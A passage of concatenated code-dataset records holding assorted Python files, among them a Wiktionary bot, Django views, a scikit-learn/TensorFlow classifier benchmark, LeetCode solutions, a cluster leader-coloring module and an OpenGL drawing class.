in page.title():\n\t\t\t\t\tnew_title = page.title().replace(quote_mark, mod_letter)\n\t\t\t\t\tif args.dry_run:\n\t\t\t\t\t\tprint(f'Would move {page.title(as_link=True)} to [[{new_title}]].')\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(f'Moving {page.title(as_link=True)} to [[{new_title}]].')\n\t\t\t\t\t\tpage.move(new_title, reason=move_summary)\n\t\t\t\t\t\t# prepare to read through the new page\n\t\t\t\t\t\tpage = pywikibot.page.Page(site, new_title)\n\t\t\t\t\t\tparsed_page = wikitextparser.parse(page.text)\n\t\t\t\t\t\tsections = parsed_page.get_sections(level=2)\n\n\t\t\t\t# Replace in page text\n\t\t\t\tsection_lines = sections[0].contents.splitlines()\n\t\t\t\tsection_sub_count = 0\n\t\t\t\tprint(f'Reading {page.title(as_link=True)}...')\n\t\t\t\tfor j, line in enumerate(section_lines):\n\t\t\t\t\tsection_lines[j], line_sub_count = re.subn(f'(?<=\\\\w){quote_mark}(?=\\\\w)', mod_letter, line)\n\t\t\t\t\tif line_sub_count:\n\t\t\t\t\t\tprint(f'Before: ' + line.encode('unicode-escape').decode())\n\t\t\t\t\t\tprint(f' After: ' + section_lines[j].encode('unicode-escape').decode())\n\t\t\t\t\t\tsection_sub_count += line_sub_count\n\t\t\t\tif section_sub_count:\n\t\t\t\t\tsections[0].contents = '\\n'.join(section_lines)\n\t\t\t\t\tpage.text = str(parsed_page)\n\t\t\t\t\tif args.dry_run:\n\t\t\t\t\t\twith open(f'{i}-{page.title()}.wiki', 'w') as saveFile:\n\t\t\t\t\t\t\tsaveFile.write(page.text)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpage.save(summary=text_summary, botflag=True, quiet=False)\n\t\t\telse:\n\t\t\t\tprint(page.title(), file=skipped_file)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"excarnateSojourner/wiktionary-bot","sub_path":"taos_apostrophes.py","file_name":"taos_apostrophes.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"140677335","text":"from collections import namedtuple\n\nimport sympy as sp\n\nExprResult = namedtuple('ExprResult',\n 'symbols,expr,domains,state,kwargs')\n\n\nclass MetricResult(object):\n \"\"\"Serializable result storing metrics\"\"\"\n __slots__ = 'effect_symbols', 'effect_latex'\n\n def __init__(self,\n symbols,\n effect):\n if not isinstance(symbols, (list, tuple)):\n symbols = (symbols,)\n\n symbols = [s.name if hasattr(s, 'name') else s\n for s in symbols]\n self.effect_symbols = symbols\n self.effect_latex = (effect if isinstance(effect, str) else\n sp.latex(effect))\n\n def as_dict(self):\n return {\n 'effect_symbols': self.effect_symbols,\n 'effect_latex': self.effect_latex,\n }\n\n @classmethod\n def from_dict(cls, d):\n obj = cls.__new__(cls)\n return obj\n","repo_name":"craymichael/PostHocExplainerEvaluation","sub_path":"posthoceval/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13624630584","text":"import random\nfrom datetime import datetime\n\nfrom django.views.generic import TemplateView\n\nfrom registration import settings\nfrom users.models import RegistrationCode\n\n\nclass IndexView(TemplateView):\n template_name = 'base.html'\n\n\nclass BotUrlView(TemplateView):\n template_name = 'bot.html'\n\n def get_context_data(self, **kwargs):\n context = super(BotUrlView, self).get_context_data()\n context['bot_name'] = settings.TELEGRAM_BOT_NAME\n if self.request.GET.get('generate') == 'yes':\n code = random.randint(10_000, 100_000)\n context['reg_code'] = code\n user = self.request.user\n\n if RegistrationCode.objects.filter(user__exact=user):\n user.reg_code.code = code\n user.reg_code.created_at = datetime.now()\n user.reg_code.save()\n else:\n code = RegistrationCode(code=code)\n user.reg_code = code\n code.save()\n return context\n","repo_name":"sch0nik/registration","sub_path":"registration/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11784215976","text":"##################################################\r\n# This file contains classification algorithms.\r\n# Callable function is classification, which returns an array of accuracies corresponding to the classifiers array.\r\n##################################################\r\n\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn import tree\r\nimport os\r\nimport sys\r\nimport warnings\r\nfrom sklearn import preprocessing\r\nfrom inoutmd import read\r\nimport numpy as np\r\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\r\nimport tensorflow as tf\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\n\r\n\r\n# Principal classification function, given a path where the DB is, an array of classifiers, and an amount of folds, it returns\r\n# an array of accuracies, with length = length(classifiers)\r\n\r\n\r\ndef classification(i, j, k, n, classifiers, folds):\r\n \"\"\"\r\n This function takes as input path indices and a list of classifier indices and returns a list of\r\n accuracies generated from the file represented by the indices and each one of the classifiers.\r\n\r\n :param i: DB index\r\n :param j: MDT index\r\n :param k: Instance index\r\n :param n: IM index\r\n :param classifiers: list of classifier indices (usually range(0, 15))\r\n :param folds: Number of folds. Fixed beforehand.\r\n :return: List of accuracies generated from the different combinations of the previous parameters\r\n \"\"\"\r\n res = None\r\n try:\r\n for c in classifiers: # Foreach classifier,\r\n if not res:\r\n res = classify(i, j, k, n, c, folds)\r\n else:\r\n res.append(classify(i, j, k, n, c, folds)[1]) # Classify\r\n res = np.array(res)\r\n np.savetxt(\"ClassificationsMD/{0}-{1}-{2}-{3}.data\".format(str(i), str(j), str(k), str(n)), res, fmt='%i')\r\n except:\r\n print(\"{0}-{1}-{2}-{3}.data\".format(str(i), str(j), str(k), str(n)))\r\n\r\n return res\r\n\r\n\r\ndef classify(i, j, k, n, c, folds):\r\n \"\"\"\r\n This function reads the file represented by i, j, k, and n indices and generates an accuracy using \"folds\" folds\r\n and the classifier indexed by c.\r\n :param i: DB index\r\n :param j: MDT index\r\n :param k: Instance index\r\n :param n: IM index\r\n :param c: classifier index\r\n :param folds: Number of folds. Fixed beforehand.\r\n :return: Accuracy generated from the use of classifier c on the data described in the file represented by the\r\n indices.\r\n \"\"\"\r\n\r\n # ##############Select classifier ################# #\r\n if c == 0:\r\n clf = LogisticRegression(penalty=\"l1\")\r\n elif c == 1:\r\n clf = LogisticRegression(penalty=\"l2\")\r\n elif c == 2:\r\n clf = LinearDiscriminantAnalysis(solver=\"lsqr\")\r\n elif c == 3:\r\n clf = QuadraticDiscriminantAnalysis(reg_param=0.01)\r\n elif c == 4:\r\n x = read(\"DataMD/{0}-{1}-{2}-{3}.data\".format(str(i), str(j), str(k), \"0\"), delimiter=\",\")\r\n size = x.shape[0]\r\n feature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=x.shape[1]-1)]\r\n clf = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns, hidden_units=[int(size/3*2), int(size/3)], n_classes=len(set(x[:, -1]))+1)\r\n #elif c == 5:\r\n #clf = tf.contrib.learn.DNNClassifier(hidden_units=[10, 20, 10])\r\n elif c == 6-1:\r\n clf = SVC(kernel='linear', C=1.0, tol=0.001, probability=True)\r\n elif c == 7-1:\r\n clf = SVC(kernel='poly', C=1.0, tol=0.01, probability=False, degree=2, cache_size=20000)\r\n elif c == 8-1:\r\n clf = SVC(kernel='rbf', C=1.0, gamma=0.10000000000000001, coef0=0, shrinking=True, probability=True)#RBFN\r\n elif c == 9-1:\r\n clf = GaussianNB() \r\n elif c == 10-1:\r\n clf = GradientBoostingClassifier(n_estimators=100, max_depth=11, subsample=1.0)\r\n elif c == 11-1:\r\n clf = RandomForestClassifier(n_estimators=10)\r\n elif c == 12-1:\r\n clf = tree.DecisionTreeClassifier() # CART, similar to c4.5\r\n elif c == 13-1:\r\n clf = KNeighborsClassifier(n_neighbors=1)\r\n elif c == 14-1:\r\n clf = KNeighborsClassifier(n_neighbors=3)\r\n #######################################################################\r\n\r\n full_predictions = []\r\n full_y = []\r\n\r\n for fold in range(0, folds):\r\n # For each stratified fold, we have one file. We read it.\r\n path = \"DataMD/\" + str(i) + \"-\" + str(j) + \"-\" + str(k) + \"-\" + str(fold) + \"-\" + str(n) + \".data\"\r\n x = read(path)\r\n x = preprocessing.Imputer().fit_transform(x)\r\n x[x == np.nan] = 0\r\n # Separate class (always in last position, watch impute.py)\r\n y = x[:, len(x[0, :])-1]\r\n x = np.delete(x, len(x[0, :])-1, 1)\r\n\r\n # If class is string, transform to numeric labels\r\n if isinstance(y[0], str):\r\n le = preprocessing.LabelEncoder()\r\n le.fit(y)\r\n y = le.transform(y)\r\n # Set where the limit between the train and testing is. Remember that we always write first the training\r\n # part and then the testing part.\r\n\r\n lim = int(x.shape[0] / folds * (folds - 1))\r\n x_train = x[:lim,:]\r\n x_test = x[lim:,:]\r\n y_train = y[:lim].astype(int)\r\n y_test = y[lim:].astype(int)\r\n\r\n def get_train_inputs():\r\n x = tf.constant(x_train)\r\n y = tf.constant(y_train)\r\n\r\n return x, y\r\n\r\n def get_test_inputs():\r\n x = tf.constant(x_test)\r\n y = tf.constant(y_test)\r\n\r\n return x, y\r\n\r\n def get_predict_input():\r\n x = tf.constant(x_test)\r\n\r\n return x\r\n\r\n if c == 4:\r\n model = clf.fit(input_fn=get_train_inputs, max_steps=20000) # Model creation\r\n predictions = model.predict(input_fn=get_predict_input)\r\n # acc = clf.evaluate(input_fn=get_test_inputs, steps=1)[\"accuracy\"]\r\n else:\r\n model = clf.fit(x_train, y_train) # Model creation\r\n predictions = model.predict(x_test)\r\n\r\n full_predictions += list(predictions)\r\n full_y += y_test.tolist()\r\n #print(full_predictions)\r\n # print(accuracy_score(full_y, full_predictions))\r\n return [full_y, full_predictions]\r\n\r\n\r\ndef nn(x_train, y_train, x_test, y_test):\r\n\r\n \"\"\"\r\n A Convolutional Network implementation example using TensorFlow library.\r\n This example is using the MNIST database of handwritten digits\r\n (http://yann.lecun.com/exdb/mnist/)\r\n\r\n Author: Aymeric Damien\r\n Project: https://github.com/aymericdamien/TensorFlow-Examples/\r\n \"\"\"\r\n\r\n # Parameters\r\n learning_rate = 0.001\r\n training_iters = 200000\r\n batch_size = 128\r\n\r\n # Network Parameters\r\n n_input = x_train.shape[1]\r\n n_classes = len(set(y_train)) # MNIST total classes (0-9 digits)\r\n dropout = 0.75 # Dropout, probability to keep units\r\n\r\n\r\n # tf Graph input\r\n x = tf.placeholder(tf.float32, [None, n_input])\r\n y = tf.placeholder(tf.float32, [None, n_classes])\r\n keep_prob = tf.placeholder(tf.float32) #dropout (keep probability)\r\n\r\n\r\n # Create some wrappers for simplicity\r\n def conv2d(x, W, b, strides=1):\r\n # Conv2D wrapper, with bias and relu activation\r\n x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')\r\n x = tf.nn.bias_add(x, b)\r\n return tf.nn.relu(x)\r\n\r\n\r\n def maxpool2d(x, k=2):\r\n # MaxPool2D wrapper\r\n return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],\r\n padding='SAME')\r\n\r\n\r\n # Create model\r\n def conv_net(x, weights, biases, dropout):\r\n\r\n\r\n # Convolution Layer\r\n conv1 = conv2d(x, weights['wc1'], biases['bc1'])\r\n # Max Pooling (down-sampling)\r\n conv1 = maxpool2d(conv1, k=2)\r\n\r\n # Convolution Layer\r\n conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])\r\n # Max Pooling (down-sampling)\r\n conv2 = maxpool2d(conv2, k=2)\r\n\r\n # Fully connected layer\r\n # Reshape conv2 output to fit fully connected layer input\r\n fc1 = tf.reshape(conv2, [-1, weights['wd1'].get_shape().as_list()[0]])\r\n fc1 = tf.add(tf.matmul(fc1, weights['wd1']), biases['bd1'])\r\n fc1 = tf.nn.relu(fc1)\r\n # Apply Dropout\r\n fc1 = tf.nn.dropout(fc1, dropout)\r\n\r\n # Output, class prediction\r\n out = tf.add(tf.matmul(fc1, weights['out']), biases['out'])\r\n return out\r\n\r\n # Store layers weight & bias\r\n weights = {\r\n # 5x5 conv, 1 input, 32 outputs\r\n 'wc1': tf.Variable(tf.random_normal([5, 5, 1, 32])),\r\n # 5x5 conv, 32 inputs, 64 outputs\r\n 'wc2': tf.Variable(tf.random_normal([5, 5, 32, 64])),\r\n # fully connected, 7*7*64 inputs, 1024 outputs\r\n 'wd1': tf.Variable(tf.random_normal([7*7*64, 1024])),\r\n # 1024 inputs, n outputs (class prediction)\r\n 'out': tf.Variable(tf.random_normal([1024, n_classes]))\r\n }\r\n\r\n biases = {\r\n 'bc1': tf.Variable(tf.random_normal([32])),\r\n 'bc2': tf.Variable(tf.random_normal([64])),\r\n 'bd1': tf.Variable(tf.random_normal([1024])),\r\n 'out': tf.Variable(tf.random_normal([n_classes]))\r\n }\r\n\r\n # Construct model\r\n pred = conv_net(x, weights, biases, keep_prob)\r\n\r\n # Define loss and optimizer\r\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\r\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)\r\n\r\n # Evaluate model\r\n correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\r\n\r\n # Initializing the variables\r\n init = tf.global_variables_initializer()\r\n\r\n # Launch the graph\r\n with tf.Session() as sess:\r\n sess.run(init)\r\n step = 1\r\n # Keep training until reach max iterations\r\n while step * batch_size < training_iters:\r\n batch_x = x[((step-1) * batch_size):(step * batch_size),:], batch_y = y[((step-1) * batch_size):(step * batch_size)]\r\n # Run optimization op (backprop)\r\n sess.run(optimizer, feed_dict={x: batch_x, y: batch_y,\r\n keep_prob: dropout})\r\n step += 1\r\n print(\"Optimization Finished!\")\r\n\r\n # Calculate accuracy for 256 mnist test images\r\n return \"Testing Accuracy:\", \\\r\n sess.run(accuracy, feed_dict={x: x_test,\r\n y: y_test,\r\n keep_prob: 1.})\r\n\r\n\"\"\"\r\npath = \"Data/\" + str(0) + \"-\" + str(0) + \"-\" + str(0) + \"-\" + str(0) + \"-\" + str(0) + \".data\"\r\nx = read(path)\r\nx = preprocessing.Imputer().fit_transform(x)\r\n# Separate class (always in last position, watch impute.py)\r\ny = x[:, len(x[0, :])-1]\r\nx = np.delete(x, len(x[0, :])-1, 1)\r\n\r\na = nn(x[:int(x.shape[0]/5*4),:], y[:int(y.shape[0]/5*4)], x[int(x.shape[0]/5*4):,:], y[int(y.shape[0]/5*4):])\r\nprint(a)\r\n\"\"\"\r\n","repo_name":"unaigarciarena/Discrete","sub_path":"Escritorio/DiscreteCode/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":11331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7162717903","text":"\nclass Solution:\n def segregate0and1(self, arr, n):\n low = 0\n high = len(arr)-1\n while (low <= high):\n if arr[low] == 0:\n low = low +1\n else:\n arr[low],arr[high]=arr[high],arr[low]\n high = high -1\n return arr\n \n\n\nif __name__ == '__main__':\n tc = int(input())\n while tc > 0:\n n = int(input())\n arr = list(map(int, input().strip().split()))\n ob = Solution()\n ob.segregate0and1(arr, n)\n print(*arr)\n tc -= 1\n\n","repo_name":"zaidjubapu/dsa450problems","sub_path":"companiesproblems/04Segregate0An1.py","file_name":"04Segregate0An1.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725137426","text":"\"\"\"\n给出一个由无重复的正整数组成的集合,找出其中最大的整除子集,子集中任意一对 (Si,Sj) 都要满足:Si % Sj = 0 或 Sj % Si = 0。\n\n如果有多个目标子集,返回其中任何一个均可。\n\n \n\n示例 1:\n\n输入: [1,2,3]\n输出: [1,2] (当然, [1,3] 也正确)\n示例 2:\n\n输入: [1,2,4,8]\n输出: [1,2,4,8]\n\"\"\"\n\nclass Solution(object):\n def largestDivisibleSubset(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n if not nums and len(nums) == 0:\n return []\n\n nums.sort()\n # 我们假设每次都从当前数字开始,看看能形成的最长方案是多少\n dp = [1] * len(nums)\n\n # k记录着我们能形成的最大子集的下标在nums的哪里\n k = 0\n for i in range(len(nums)):\n for j in range(0, i):\n\n if nums[i] % nums[j] == 0:\n dp[i] = max(dp[i], dp[j] + 1)\n # 我们把能形成的最大子集下标更新到k\n if dp[i] > dp[k]:\n k = i\n\n # 我们先把最大的那一位给加进答案\n res = [nums[k]]\n\n while dp[k] > 1:\n for i in range(k):\n # 我们要把刚刚的递推顺序从后往前找出来\n if nums[k] % nums[i] == 0 and dp[k] == dp[i] + 1:\n # 然后把上一个怎么变过来的\n # 加到res里去\n res.append(nums[i])\n k = i\n break\n\n # res就是最长的递增子集方案了\n return res\n\n# https://www.acwing.com/video/1754/","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/DP/368m. 最大整除子集(同求最大递增集合300).py","file_name":"368m. 最大整除子集(同求最大递增集合300).py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26421154198","text":"from django.shortcuts import render,redirect\r\nfrom .forms import UserCreateForm,UserProfileForm,FriendRequestForm\r\nfrom django.contrib.auth import authenticate,login,logout\r\nfrom django.contrib.auth.models import User\r\nfrom .models import UserProfile,FriendRequest\r\nfrom django.contrib.auth.decorators import login_required\r\n# Create your views here.\r\n\r\n@login_required(login_url='login')\r\ndef HomePage(request):\r\n profile=UserProfile.objects.get(user=request.user)\r\n friends=profile.friends.all()\r\n frs=[]\r\n try :\r\n frr=FriendRequest.objects.filter(receiver=request.user,is_active=True)\r\n frs=[]\r\n for i in frr:\r\n frs.append(i.sender.username)\r\n except:\r\n frs=['No Friends']\r\n context={'friends':friends,'frs':frs}\r\n\r\n return(render(request,'home.html',context))\r\n\r\n\r\n\r\n\r\ndef LoginPage(request):\r\n if(request.user.is_authenticated):\r\n return redirect('home')\r\n if(request.method==\"POST\"):\r\n username=request.POST.get('username')\r\n password=request.POST.get('password')\r\n user=authenticate(request,username=username,password=password)\r\n if user is not None:\r\n login(request,user)\r\n return redirect('home')\r\n return(render(request,'Login.html'))\r\n\r\n\r\n@login_required(login_url='login')\r\ndef SendFrReq(request):\r\n frf = FriendRequestForm()\r\n msg=''\r\n if (request.method == \"POST\"):\r\n fr = FriendRequestForm(request.POST)\r\n if(fr.is_valid()):\r\n freq=fr.save(commit=False)\r\n freq.sender=request.user\r\n freq.save()\r\n msg=\"Friend Request Sent\"\r\n fr.sender = request.user\r\n\r\n return (render(request, 'SendFriendReq.html', {'friendRF': frf,'msg':msg}))\r\n\r\n\r\n\r\ndef RegisterPage(request):\r\n if(request.user.is_authenticated):\r\n return redirect('home')\r\n if(request.method==\"POST\"):\r\n form=UserCreateForm(request.POST)\r\n profile_form=UserProfileForm(request.POST)\r\n\r\n if(form.is_valid() and profile_form.is_valid()):\r\n user=form.save()\r\n profile=profile_form.save(commit=False)\r\n profile.user=user\r\n profile.save()\r\n return redirect('login')\r\n\r\n form = UserCreateForm()\r\n user_profile_form=UserProfileForm()\r\n return(render(request,'Register.html',{'form':form,'userprofile':user_profile_form}))\r\n\r\n@login_required(login_url='login')\r\ndef logoutPage(request):\r\n logout(request)\r\n return redirect('login')\r\n\r\n\r\ndef SearchChat(request):\r\n\r\n return(render(request,'ChatSearch.html'))\r\n\r\n@login_required(login_url='login')\r\ndef AcceptFR(request,username):\r\n usr=User.objects.get(username=username)\r\n frr=FriendRequest.objects.get(sender=usr,receiver=request.user)\r\n frr.accept()\r\n frr.save()\r\n return redirect('SendFR')\r\n","repo_name":"Murgowt/WeConnect","sub_path":"Backend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42511747114","text":"input_string = 'dog goat dad duck doodle never'\ninput_string2 = 'racecar'\ninput_string3 = 'A Toyota! Race fast, safe car!'\n\ndef palindrome_search(input_str):\n result = list()\n result = palindromes(input_str, result)\n input_str = input_str.replace(' ', '').lower().replace(',', '').replace('!', '')\n result = palindromes(input_str, result)\n result = sorted(set(result))\n return result\n\ndef palindromes(string, search_result):\n length = 3\n while length <= len(string):\n for i in range(0, len(string) - 1, 1):\n x = string[i:i + length:1]\n if x == x[:: -1]:\n search_result.append(x)\n length += 1\n return search_result\n\n\n\n\nprint(palindrome_search(input_string))\nprint(palindrome_search(input_string2))\nprint(palindrome_search(input_string3))\n","repo_name":"green-fox-academy/FarkasLaszlo","sub_path":"week-02/day-05/03 Palindrome searcher.py","file_name":"03 Palindrome searcher.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725328146","text":"\"\"\"\n给定一个数组 A[0,1,…,n-1],请构建一个数组 B[0,1,…,n-1],\n其中 B 中的元素 B[i]=A[0]×A[1]×…×A[i-1]×A[i+1]×…×A[n-1]。不能使用除法。\n\n\n示例:\n输入: [1,2,3,4,5]\n输出: [120,60,40,30,24]\n\"\"\"\n\n\nclass Solution(object):\n def constructArr(self, a):\n \"\"\"\n :type a: List[int]\n :rtype: List[int]\n \"\"\"\n\n length = len(a)\n b = [1 for _ in range(length)]\n\n for i in range(1, length):\n b[i] = b[i - 1] * a[i - 1]\n\n temp = 1\n # 因为对于我们来说,最开始的话,是要从最边缘既是a[i+1]开始的\n # b[i] a[i+1], i+1 = length-1\n for i in range(length - 2, -1, -1):\n temp *= a[i + 1]\n b[i] *= temp\n\n return b","repo_name":"Andrewlearning/Leetcoding","sub_path":"剑指offer/面试题66. 构建乘积数组(倒三角相乘238).py","file_name":"面试题66. 构建乘积数组(倒三角相乘238).py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71816851666","text":"limitToResultsContaining = 'NC'\n\nimport rhinoscriptsyntax as rs\nfhand = open('brickstacking/data analysis/yelp_academic_dataset_business.json')\nxCoords = []\nyCoords = []\npoints = []\n\nfor line in fhand:\n if limitToResultsContaining in line:\n line.strip()\n pos = line.find('latitude')\n pos2 = line.find(',',pos)\n pos3 = line.find('longitude')\n pos4 = line.find(',',pos3)\n xCoords.append(float(line[pos+10:pos2]))\n yCoords.append(float(line[pos3+11:pos4]))\n\nfor i in range(len(xCoords)):\n points.append(rs.AddPoint(xCoords[i],yCoords[i],0))\n\nfor i in range(len(points)):\n\tclosest = rs.PointArrayClosestPoint(points,points[i])\n\tdistance = rs.VectorLength(rs.VectorCreate(closest,points[i]))\n\t'''if distance > 1 :\n\t\tpoints.pop(i)'''","repo_name":"rachelalutes/ideas_seminar","sub_path":"brickstacking/data_analysis/Untitled-1.py","file_name":"Untitled-1.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34796896969","text":"\n\n\nclass FunctionTableEntry:\n def __init__(self,id ,name, type, scope = None, belongsTo = None):\n self.id = id\n self.name = name\n self.type = type\n self.scope = scope\n self.belongsTo = belongsTo\n def __str__(self):\n return '{0} {1} {2} {3} {4}'.format(self.id,self.name, self.type, self.scope, self.belongsTo)\n\nclass FunctionTable:\n def __init__(self):\n self.entries = []\n abort = FunctionTableEntry(1,\"abort\",\"Object\", 1,\"Object\")\n type_name= FunctionTableEntry(2,\"type_name\",\"String\", 1,\"Object\")\n copy = FunctionTableEntry(3,\"copy\",\"OBJECT\", 1,\"Object\")\n out_string = FunctionTableEntry(4,\"out_string\",\"IO\", 1,\"IO\")\n out_int = FunctionTableEntry(5,\"out_int\",\"IO\", 1,\"IO\")\n in_string = FunctionTableEntry(6,\"in_string\",\"String\", 1,\"IO\")\n in_int = FunctionTableEntry(7,\"in_int\",\"Int\", 1,\"IO\")\n length = FunctionTableEntry(8,\"length\",\"Int\", 1,\"String\")\n concat = FunctionTableEntry(9,\"concat\",\"String\", 1,\"String\")\n substr = FunctionTableEntry(10,\"substr\",\"String\", 1,\"String\")\n self.entries.append(abort)\n self.entries.append(type_name)\n self.entries.append(copy)\n self.entries.append(out_string)\n self.entries.append(out_int)\n self.entries.append(in_string)\n self.entries.append(in_int)\n self.entries.append(length)\n self.entries.append(concat)\n self.entries.append(substr)\n\n def addEntry(self, FunctionTableEntry):\n if self.findEntryByName(FunctionTableEntry.name, FunctionTableEntry.belongsTo) is None:\n self.entries.append(FunctionTableEntry)\n return True\n else:\n return False\n\n def findEntryByName(self, name, belongsTo):\n for entry in self.entries:\n if entry.name == name and entry.belongsTo == belongsTo:\n return entry \n return None\n \n def findEntryByID(self, id):\n for entry in self.entries:\n if entry.id == id:\n return entry\n return None\n\n","repo_name":"michelebenvenuto/compiladores2022","sub_path":"tables/FunctionTable.py","file_name":"FunctionTable.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11633500592","text":"import math\nimport threading\nfrom typing import List, Optional\n\nfrom consts import *\nfrom messaging import send_message, Message, MessageType\nfrom utils import create_timeout, log\nimport copy\n\n\nclass Cluster:\n def __init__(self, ip_network: str, ip_offset: int, nodes_count: int, current_node: int):\n self.ip_network = ip_network\n self.ip_offset = ip_offset\n self.nodes_count = nodes_count\n self.current_node = current_node\n\n self.leader = None\n\n self.ips = [self.ip_network + \".\" + str(self.ip_offset + i) for i in range(self.nodes_count)]\n self.colors: List[Optional[str]] = [None for i in range(self.nodes_count)]\n self.alive = [False for i in range(self.nodes_count)]\n\n self.color_nodes_timer = None\n self.colors_check_timer: threading.Timer = create_timeout(COLORS_CHECK_INTERVAL, self.color_check)\n\n def get_higher_ids(self, higher_than) -> List[int]:\n return [i for i in range(higher_than + 1, self.nodes_count)]\n\n def get_lower_ids(self, lower_than) -> List[int]:\n return [i for i in range(0, lower_than)]\n\n def convert_to_ips(self, ids: List[int]):\n return [self.ips[i] for i in ids]\n\n def leader_changed(self, new_leader):\n self.leader = new_leader\n self.color_check()\n\n def color_check(self):\n self.colors_check_timer: threading.Timer = create_timeout(COLORS_CHECK_INTERVAL, self.color_check)\n\n if self.leader == self.current_node:\n self.check_alive()\n self.color_nodes_timer = create_timeout(ALIVE_TIMEOUT, self.color_nodes) # check for check alive to finish\n\n def check_alive(self):\n for i in range(self.nodes_count):\n self.alive[i] = False\n send_message(self.ips[i], Message(MessageType.PING, self.current_node, \"\"))\n\n def pong_received(self, node_id):\n self.alive[node_id] = True\n\n def color_nodes(self):\n if self.leader is None:\n return\n\n changed = self.__determine_coloring()\n\n if changed:\n for i in range(self.nodes_count):\n send_message(self.ips[i], Message(MessageType.COLOR, self.current_node, self.colors[i]))\n\n def __determine_coloring(self):\n total_live = self.alive.count(True)\n log(\"alive: \" + str(self.alive) + \" (count: \" + str(total_live) + \")\")\n\n green_nodes_left = math.ceil(total_live * GREEN_COLOR_REQUIRED)\n\n new_colors = [None for i in range(self.nodes_count)]\n\n new_colors[self.leader] = \"GREEN\" # leader always green\n green_nodes_left -= 1\n\n for i in range(self.nodes_count):\n if i == self.leader:\n continue\n\n if self.alive[i]:\n if i < green_nodes_left:\n new_colors[i] = \"GREEN\"\n green_nodes_left -= 1\n else:\n new_colors[i] = \"RED\"\n else:\n new_colors[i] = \"-\"\n\n if self.colors == new_colors:\n log(\"coloring ok\")\n log(str(self.colors))\n return False\n else:\n self.colors = new_colors\n log(\"new colors assigned\")\n log(str(self.colors))\n return True\n","repo_name":"lukasvlc3k/ds-01","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33124948930","text":"from OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GLUT import *\n\nimport os\nimport math\nimport numpy as np\n\nclass Drawing:\n\n def __init__(self):\n return None\n\n def Baseline(self):\n for i in range(200):\n glLineWidth(2.0)\n glBegin(GL_LINES)\n if i==100:\n glColor3f(1,1,0) # x축\n glVertex3fv([1,0,0])\n glVertex3fv([0,0,0])\n glColor3f(0,1,0) # z축\n glVertex3fv([0,0,1])\n glVertex3fv([0,0,0])\n \n glColor3f(0.5,0.5,0.5)\n glVertex3fv([100,0,0])\n glVertex3fv([1,0,0])\n glVertex3fv([0,0,0])\n glVertex3fv([-100,0,0])\n glVertex3fv([0,0,100])\n glVertex3fv([0,0,1])\n glVertex3fv([0,0,0])\n glVertex3fv([0,0,-100])\n else :\n glColor3f(0.5,0.5,0.5)\n glVertex3fv([-100+i,0,-100])\n glVertex3fv([-100+i,0,100])\n glVertex3fv([100,0,-100+i])\n glVertex3fv([-100,0,-100+i])\n glEnd()\n\n glLineWidth(2.0)\n glBegin(GL_LINES) \n glColor3f(0,0,1)\n glVertex3fv([0,1,0])\n glVertex3fv([0,0,0])\n glEnd()\n\n\n def Box(self,degree):\n glutSolidCube(1.0)\n\n def Sphere(self,degree):\n glutSolidSphere(degree,30,30)\n\n def Draw_Skeleton(self,Pos,Euler,Scale,Name):\n glPushMatrix()\n 